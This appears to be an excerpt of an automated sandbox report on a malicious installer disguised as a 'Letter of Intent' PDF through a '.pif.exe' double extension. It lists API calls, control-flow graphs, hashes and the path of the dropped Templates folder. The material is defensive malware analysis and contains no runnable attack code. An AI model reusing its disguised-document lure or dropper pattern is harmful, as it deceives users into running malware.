                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                      • API String ID: 2035342205-873675662
                                                                                      • Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                                      • Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
                                                                                      • Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                                      • Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D
                                                                                      Function 004060B0 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                      • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                      • String ID:
                                                                                      • API String ID: 310444273-0
                                                                                      • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                                      • Instruction ID: 8a2f4544d0f7460eb2636e635d5deeba11c8ac6a6071c480d08d1599e38ef1a2
                                                                                      • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                                      • Instruction Fuzzy Hash: C3E0CD326002309BC3204B30AE4497773EC9F98640305043EF645F6000CB74DC22EF69
                                                                                      Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise, xrefs: 004020F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise
                                                                                      • API String ID: 542301482-1474987328
                                                                                      • Opcode ID: ced5e99aaffe7430686aafaeeeb7172db2a27b0dd067f68319d3ec3d6b497135
                                                                                      • Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
                                                                                      • Opcode Fuzzy Hash: ced5e99aaffe7430686aafaeeeb7172db2a27b0dd067f68319d3ec3d6b497135
                                                                                      • Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54
                                                                                      Function 00406089 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406094
                                                                                      • FindClose.KERNEL32(00000000), ref: 004060A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                                      • Instruction ID: 8c9aebf9a212da5294cb1f82767a4f5960c49382cb163a998aea3b369420c93e
                                                                                      • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                                      • Instruction Fuzzy Hash: B2D012716585209BC7905738AE0C84B7A98AF593717224B36F46BF22E0CB3C8C66869C
                                                                                      Function 00403ABD Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 168 403abd-403acf 169 403c10-403c1f 168->169 170 403ad5-403adb 168->170 172 403c21-403c69 GetDlgItem * 2 call 403f95 SetClassLongW call 40140b 169->172 173 403c6e-403c83 169->173 170->169 171 403ae1-403aea 170->171 174 403aec-403af9 SetWindowPos 171->174 175 403aff-403b02 171->175 172->173 177 403cc3-403cc8 call 403fe1 173->177 178 403c85-403c88 173->178 174->175 179 403b04-403b16 ShowWindow 175->179 180 403b1c-403b22 175->180 185 403ccd-403ce8 177->185 182 403c8a-403c95 call 401389 178->182 183 403cbb-403cbd 178->183 179->180 186 403b24-403b39 DestroyWindow 180->186 187 403b3e-403b41 180->187 182->183 205 403c97-403cb6 SendMessageW 182->205 183->177 190 403f62 183->190 191 403cf1-403cf7 185->191 192 403cea-403cec call 40140b 185->192 194 403f3f-403f45 186->194 196 403b43-403b4f SetWindowLongW 187->196 197 403b54-403b5a 187->197 193 403f64-403f6b 190->193 201 403f20-403f39 DestroyWindow EndDialog 191->201 202 403cfd-403d08 191->202 192->191 194->190 199 403f47-403f4d 194->199 196->193 203 403b60-403b71 GetDlgItem 197->203 204 403bfd-403c0b call 403ffc 197->204 199->190 206 403f4f-403f58 ShowWindow 199->206 201->194 202->201 207 403d0e-403d5b call 405d68 call 403f95 * 3 GetDlgItem 202->207 208 403b90-403b93 203->208 209 403b73-403b8a SendMessageW IsWindowEnabled 203->209 204->193 205->193 206->190 238 403d65-403da1 ShowWindow KiUserCallbackDispatcher call 403fb7 EnableWindow 207->238 239 403d5d-403d62 207->239 213 403b95-403b96 208->213 214 403b98-403b9b 208->214 209->190 209->208 216 403bc6-403bcb call 403f6e 213->216 217 403ba9-403bae 214->217 218 403b9d-403ba3 214->218 216->204 219 403bb0-403bb6 217->219 220 403be4-403bf7 SendMessageW 217->220 218->220 223 403ba5-403ba7 218->223 224 403bb8-403bbe call 40140b 219->224 225 403bcd-403bd6 call 40140b 219->225 220->204 223->216 234 403bc4 224->234 225->204 235 403bd8-403be2 225->235 234->216 235->234 242 403da3-403da4 238->242 243 403da6 238->243 239->238 244 403da8-403dd6 GetSystemMenu EnableMenuItem SendMessageW 242->244 243->244 245 403dd8-403de9 SendMessageW 244->245 246 403deb 244->246 247 403df1-403e2f call 403fca call 405d46 lstrlenW call 405d68 SetWindowTextW call 401389 245->247 246->247 247->185 256 403e35-403e37 247->256 256->185 257 403e3d-403e41 256->257 258 403e60-403e74 DestroyWindow 257->258 259 403e43-403e49 257->259 258->194 261 403e7a-403ea7 CreateDialogParamW 258->261 259->190 260 403e4f-403e55 259->260 260->185 262 403e5b 260->262 261->194 263 403ead-403f04 call 403f95 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 261->263 262->190 263->190 268 403f06-403f19 ShowWindow call 403fe1 263->268 270 403f1e 268->270 270->194
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                                                      • ShowWindow.USER32(?), ref: 00403B16
                                                                                      • DestroyWindow.USER32 ref: 00403B2A
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403B67
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                                                      • EnableWindow.USER32(?,?), ref: 00403D99
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                                                      • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                                                      • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: $@d
                                                                                      • API String ID: 3282139019-2057559402
                                                                                      • Opcode ID: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                                                      • Instruction ID: 9063085a3fd87244c99a969d1f6d2bb761e88773988a4a67d8464f71257f90be
                                                                                      • Opcode Fuzzy Hash: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                                                      • Instruction Fuzzy Hash: 7BC1CD71900305BFDB216F65EE8AE2A3E7CFB4970AB14043EF641B11E1CB7999429B1D
                                                                                      Function 0040371A Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 271 40371a-403732 call 4060b0 274 403734-403744 call 405c8d 271->274 275 403746-40377d call 405c13 271->275 283 4037a0-4037c9 call 4039f0 call 4058b6 274->283 280 403795-40379b lstrcatW 275->280 281 40377f-403790 call 405c13 275->281 280->283 281->280 289 40385b-403863 call 4058b6 283->289 290 4037cf-4037d4 283->290 296 403871-403896 LoadImageW 289->296 297 403865-40386c call 405d68 289->297 290->289 291 4037da-4037f4 call 405c13 290->291 295 4037f9-403802 291->295 295->289 298 403804-403808 295->298 300 403917-40391f call 40140b 296->300 301 403898-4038c8 RegisterClassW 296->301 297->296 305 40381a-403826 lstrlenW 298->305 306 40380a-403817 call 4057db 298->306 313 403921-403924 300->313 314 403929-403934 call 4039f0 300->314 302 4039e6 301->302 303 4038ce-403912 SystemParametersInfoW CreateWindowExW 301->303 310 4039e8-4039ef 302->310 303->300 307 403828-403836 lstrcmpiW 305->307 308 40384e-403856 call 4057ae call 405d46 305->308 306->305 307->308 312 403838-403842 GetFileAttributesW 307->312 308->289 317 403844-403846 312->317 318 403848-403849 call 4057fa 312->318 313->310 324 40393a-403957 ShowWindow LoadLibraryW 314->324 325 4039bd-4039be call 4050cd 314->325 317->308 317->318 318->308 327 403960-403972 GetClassInfoW 324->327 328 403959-40395e LoadLibraryW 324->328 329 4039c3-4039c5 325->329 330 403974-403984 GetClassInfoW RegisterClassW 327->330 331 40398a-4039ad DialogBoxParamW call 40140b 327->331 328->327 332 4039c7-4039cd 329->332 333 4039df-4039e1 call 40140b 329->333 330->331 337 4039b2-4039bb call 40366a 331->337 332->313 335 4039d3-4039da call 40140b 332->335 333->302 335->313 337->310
                                                                                      APIs
                                                                                        • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                        • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                        • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                      • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 0040379B
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403839
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright), ref: 00403882
                                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                      • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                                                      • RegisterClassW.USER32(00433E40), ref: 00403984
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$.DEFAULT\Control Panel\International$.exe$1033$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                      • API String ID: 914957316-3983456543
                                                                                      • Opcode ID: 80b72d26a292049b4bfb8d00ad29ddbe8f9948a161ce829f9e4aace619823c0e
                                                                                      • Instruction ID: f2efbd8b4e2183f22d1c30e2af872408ecd3ec1be094dd46b245239935a3b56e
                                                                                      • Opcode Fuzzy Hash: 80b72d26a292049b4bfb8d00ad29ddbe8f9948a161ce829f9e4aace619823c0e
                                                                                      • Instruction Fuzzy Hash: 9B61D771100700AED320BF669D46F2B3AACEB85B46F10403FF941B62E2DBB95941CB2D
                                                                                      Function 00402CFF Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 342 402cff-402d4d GetTickCount GetModuleFileNameW call 4059cf 345 402d59-402d87 call 405d46 call 4057fa call 405d46 GetFileSize 342->345 346 402d4f-402d54 342->346 354 402e74-402e82 call 402c9b 345->354 355 402d8d 345->355 347 402f31-402f35 346->347 361 402e84-402e87 354->361 362 402ed7-402edc 354->362 357 402d92-402da9 355->357 359 402dab 357->359 360 402dad-402daf call 403160 357->360 359->360 366 402db4-402db6 360->366 364 402e89-402e9a call 403192 call 403160 361->364 365 402eab-402ed5 GlobalAlloc call 403192 call 402f38 361->365 362->347 387 402e9f-402ea1 364->387 365->362 391 402ee8-402ef9 365->391 369 402dbc-402dc3 366->369 370 402ede-402ee6 call 402c9b 366->370 371 402dc5-402dd9 call 40598a 369->371 372 402e3f-402e43 369->372 370->362 380 402e4d-402e53 371->380 389 402ddb-402de2 371->389 379 402e45-402e4c call 402c9b 372->379 372->380 379->380 382 402e62-402e6c 380->382 383 402e55-402e5f call 40615e 380->383 382->357 390 402e72 382->390 383->382 387->362 393 402ea3-402ea9 387->393 389->380 395 402de4-402deb 389->395 390->354 396 402f01-402f06 391->396 397 402efb 391->397 393->362 393->365 395->380 398 402ded-402df4 395->398 399 402f07-402f0d 396->399 397->396 398->380 400 402df6-402dfd 398->400 399->399 401 402f0f-402f2a SetFilePointer call 40598a 399->401 400->380 402 402dff-402e1f 400->402 405 402f2f 401->405 402->362 404 402e25-402e29 402->404 406 402e31-402e39 404->406 407 402e2b-402e2f 404->407 405->347 406->380 408 402e3b-402e3d 406->408 407->390 407->406 408->380
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402D10
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
                                                                                        • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                        • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$0M$4O$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-2733377426
                                                                                      • Opcode ID: f39ec285b267d87009764415962ff8c31982be6a7c408a4c5a139223d7b9fa5b
                                                                                      • Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
                                                                                      • Opcode Fuzzy Hash: f39ec285b267d87009764415962ff8c31982be6a7c408a4c5a139223d7b9fa5b
                                                                                      • Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D
                                                                                      Function 10001B47 Relevance: 18.5, APIs: 12, Instructions: 513stringmemorylibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C38
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C84
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C8E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001CA8
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D93
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D98
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D9D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F41
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 100020A7
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 1000211B
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 1000212C
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 10002160
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$HandleLibraryLoadModulelstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 226667998-0
                                                                                      • Opcode ID: 497f47c059bfad1cd3fe69a1c7935fe07f5f3e9fd82650e551f1cf745244c627
                                                                                      • Instruction ID: 9214d8348323811176710d48f0999532050fa3b9ecb2d2361bd4991e80454b50
                                                                                      • Opcode Fuzzy Hash: 497f47c059bfad1cd3fe69a1c7935fe07f5f3e9fd82650e551f1cf745244c627
                                                                                      • Instruction Fuzzy Hash: D6128B75D04646DBEB20CFA4C8806EEBBF4FB043D4F21462AE565E3298E7749A81DB50
